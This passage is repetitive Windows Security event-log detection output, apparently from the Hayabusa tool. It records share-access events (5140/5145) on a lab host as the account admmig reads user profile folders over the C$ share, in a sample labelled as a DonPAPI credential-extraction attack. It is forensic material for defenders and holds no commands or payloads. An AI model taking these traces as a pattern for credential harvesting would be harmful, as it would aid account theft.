\??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.580 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.596 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.596 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.611 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.627 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.643 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.674 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.705 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.705 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.705 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.705 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.721 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.721 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.721 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.721 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.721 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.721 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.736 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.752 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.752 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.752 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.752 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.752 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.768 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.768 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.768 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.768 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.768 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.768 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.783 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.783 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.783 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:05.783 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 